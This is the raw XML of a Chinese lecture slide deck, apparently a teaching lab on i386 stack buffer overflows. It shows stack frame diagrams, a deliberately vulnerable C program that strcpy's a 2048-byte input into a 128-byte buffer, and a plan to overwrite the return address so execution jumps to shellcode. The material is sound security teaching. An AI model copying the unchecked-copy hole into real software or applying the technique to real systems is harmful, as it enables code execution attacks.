            <a:xfrm>
              <a:off x="1917" y="2193"/>
              <a:ext cx="13862" cy="1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sz="3300" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E3C63"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>操作系统：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" sz="3300" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E3C63"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria" panose="02040503050406030204" charset="0"/>
                  <a:ea typeface="cam" charset="0"/>
                  <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
                </a:rPr>
                <a:t>Ubuntu 22.04 jammy</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" sz="3300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
                <a:latin typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:ea typeface="cam" charset="0"/>
                <a:cs typeface="Cambria" panose="020405030504060302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3803" y="5704205"/>
            <a:ext cx="8805227" cy="670560"/>
            <a:chOff x="1913" y="2193"/>
            <a:chExt cx="13866" cy="1056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="矩形 16"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1913" y="2572"/>
              <a:ext cx="13866" cy="677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"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="文本框 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1917" y="2193"/>
              <a:ext cx="13862" cy="1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sz="3300" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E3C63"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>内核版本：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" sz="3300" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E3C63"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria" panose="02040503050406030204" charset="0"/>
                  <a:ea typeface="cam" charset="0"/>
                  <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
                </a:rPr>
                <a:t>Linux 5.15.0-102-generic</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" sz="3300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
                <a:latin typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:ea typeface="cam" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204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4630" y="2879725"/>
            <a:ext cx="8458200" cy="3870960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12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5778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实验原理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143951" y="1802476"/>
            <a:ext cx="0" cy="66825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046605" y="2493010"/>
            <a:ext cx="5210810" cy="5950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</a:pP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对于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>i386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平台的函数调用过程，一般的栈帧结构为：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ret addr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+-----------+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old %ebp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+-----------+ &lt;---- %ebp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  local  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| variables |</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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+-----------+ &lt;---- %esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="28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71660" y="2493010"/>
            <a:ext cx="8620760" cy="582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利用栈缓冲区溢出将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ret addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t> 覆写为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ret addr'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lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc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+-----------+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| ret addr' |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+-----------+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|  XXXXXXXX |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+-----------+ &lt;---- %ebp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|   XXXXX   |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| XXXXXXXXX |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+-----------+ &lt;---- %esp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57780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实验原理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9143951" y="1802476"/>
            <a:ext cx="0" cy="66825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344295" y="2493010"/>
            <a:ext cx="7178040" cy="62528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cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>函数返回前的退栈操作：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0">
              <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:endParaRPr lang="en-US" sz="2800" b="0">
              <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:endParaRPr lang="en-US" sz="2800" b="0">
              <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" b="0">
              <a:cs typeface="Cambria" panose="02040503050406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&gt; movl %ebp, %esp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&gt; popl %ebp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+-----------+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| ret addr' |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+-----------+ &lt;---- %esp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|  XXXXXXXX | ----&gt; %ebp = XXXXXXXX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+-----------+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|   XXXXX   |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| XXXXXXXXX |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  <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" charset="0"/>
              </a:rPr>
              <a:t>+-----------+</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b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04680" y="2493010"/>
            <a:ext cx="8620760" cy="6252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函数返回，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ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t> 指令执行：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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 ret (equals to `popl %eip`)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+-----------+ &lt;---- %esp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| ret addr' | ----&gt; %eip = ret addr'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+-----------+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|  XXXXXXXX |       %ebp = XXXXXXXX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+-----------+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|   XXXXX   |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| XXXXXXXXX |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+-----------+</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="280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12001" y="3721735"/>
            <a:ext cx="10320020" cy="1576070"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135000" tIns="70200" rIns="135000" bIns="70200" anchor="b" anchorCtr="0">
            <a:no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zh-CN" altLang="en-US" sz="9600" b="0" kern="1200" normalizeH="0" baseline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造字工房朗倩（非商用）常规体" charset="-122"/>
                <a:ea typeface="造字工房朗倩（非商用）常规体" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>漏洞代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" b="0" kern="1200" normalizeH="0" baseline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造字工房朗倩（非商用）常规体" charset="-122"/>
              <a:ea typeface="造字工房朗倩（非商用）常规体" charset="-122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3526" y="2496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  <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18000" i="1" dirty="0">
                <a:ln w="19050">
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="100000">
                      <a:srgbClr val="5399D4"/>
                    </a:gs>
                    <a:gs pos="4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代码漏洞分析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668586" y="1802476"/>
            <a:ext cx="0" cy="66825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35990" y="2375535"/>
            <a:ext cx="9732645" cy="6123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#include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>&lt;stdio.h&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="008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#include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>&lt;string.h&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="008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solidFill>
                  <a:srgbClr val="BC7A00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>#include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>&lt;stdlib.h&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="00800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main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int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argc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char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*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argv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[])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{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char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128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>
                <a:solidFill>
                  <a:srgbClr val="902000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>char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input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[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2048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];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printf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"%p\n"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printf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solidFill>
                  <a:srgbClr val="4070A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>"%p\n"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input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if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(!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fgets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input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sizeof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input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stdin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))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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="007020"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>return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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0">
                <a:solidFill>
                  <a:srgbClr val="40A070"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="1">
                <a:solidFill>
                  <a:srgbClr val="60A0B0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>// vulnerable code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" i="1">
              <a:solidFill>
                <a:srgbClr val="60A0B0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       strcpy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(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buf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,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 input</a:t>
            </a:r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);</a:t>
            </a:r>
            <a:endParaRPr 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  <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" b="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill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76610" y="2815590"/>
            <a:ext cx="681037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Font typeface="+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>漏洞代码的行为是：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2800" b="0">
              <a:cs typeface="Cambria" panose="0204050305040603020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 b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>从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stdin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读取输入到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input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中</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2800" b="0">
              <a:cs typeface="Cambria" panose="0204050305040603020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 b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>将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input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中的输入拷贝到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buf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中</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2800" b="0">
              <a:cs typeface="Cambria" panose="0204050305040603020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CN" sz="2800" b="0">
              <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>其中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1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是漏洞代码，由于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input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的长度远大于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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>，因此可能会发生缓冲区溢出，是实现攻击的关键。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="0">
              <a:cs typeface="Cambria" panose="0204050305040603020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479665" y="3906520"/>
            <a:ext cx="3540760" cy="2219325"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="762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10865" y="6169660"/>
            <a:ext cx="7398385" cy="652780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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08885" y="7504430"/>
            <a:ext cx="3884930" cy="65278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581775" y="4548505"/>
            <a:ext cx="4405630" cy="28829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1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  <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6000" i="1" dirty="0"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3C63"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞利用思路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295" y="6189980"/>
            <a:ext cx="12221845" cy="28898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sz="2800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>可以构造 payload：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2800" b="0"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800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>将 shellcode 直接放置在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input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中，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2800" b="0"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800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>并利用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strcpy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函数将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input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头部的数据拷贝到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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2800" b="0">
              <a:cs typeface="Cambria" panose="0204050305040603020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800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>这些头部数据将覆盖栈帧中的返回地址，将控制流转移到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en-US" sz="2800" b="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>的 shellcode。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="0">
              <a:cs typeface="Cambria" panose="02040503050406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6820" y="1529715"/>
            <a:ext cx="526351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&gt; fget()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| [ret addr]  | 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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>+-------------+ &lt;---- %ebp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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>|   [%ebp]    |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|   XXXXXXX   |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 &lt;---- buf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|  shellcode  | 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 &lt;---- ret addr’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|     head    |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 &lt;---- input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="24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90335" y="1529715"/>
            <a:ext cx="591629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 &gt; strcpy()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/+-------------+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|| [ret addr’] | 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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     |+-------------+ &lt;---- %ebp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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>head&lt; |   XXXXXXXX  |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|+-------------+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||   XXXXXXXX  |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\+-------------+ &lt;---- buf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 |  shellcode  | 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 +-------------+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 |     head    |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      +-------------+ &lt;---- input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
              <a:cs typeface="Cambria" panose="02040503050406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406630" y="1529715"/>
            <a:ext cx="526351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&gt; return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r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> &lt;---- %esp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| [ret addr]  | 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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>+-------------+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>
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>|   [%ebp]    |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|   XXXXXXX   |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 &lt;---- buf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|  shellcode  | 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 &lt;---- %eip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|     head    |</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
              <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>+-------------+ &lt;---- input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
              <a:cs typeface="Cambria" panose="020405030504060302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5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiZWNmMTdiZjYwYTE0N2JiZTY2ZmQwZjRkNjc0ZWQ1ZjM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023国科大融媒体编辑部出品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11232</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>687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Wingdings</vt:lpstr>
      <vt:lpstr>造字工房朗倩（非商用）常规体</vt:lpstr>
      <vt:lpstr>AR PL UKai CN</vt:lpstr>
      <vt:lpstr>Bauhaus 93</vt:lpstr>
      <vt:lpstr>-apple-system</vt:lpstr>
      <vt:lpstr>Gubbi</vt:lpstr>
      <vt:lpstr>仿宋</vt:lpstr>
      <vt:lpstr>Gabriola</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>DejaVu Sans</vt:lpstr>
      <vt:lpstr>幼圆</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>cam</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>2023国科大融媒体编辑部出品</vt:lpstr>
      <vt:lpstr>开源软件供应链分析 --以PyTorch为例 Case Study: PyTorch Open Source Supply Chain</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PyTorch依赖分析</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PyTorch许可分析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PyTorch应用分析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PyTorch风险分析</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>感谢观看 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Mob</dc:creator>
  <cp:lastModifiedBy>haooops</cp:lastModifiedBy>
  <cp:revision>154</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-17T07:13:12Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-17T07:13:12Z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2052-11.1.0.11708</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr/>
  </property>
</Properties>
</file>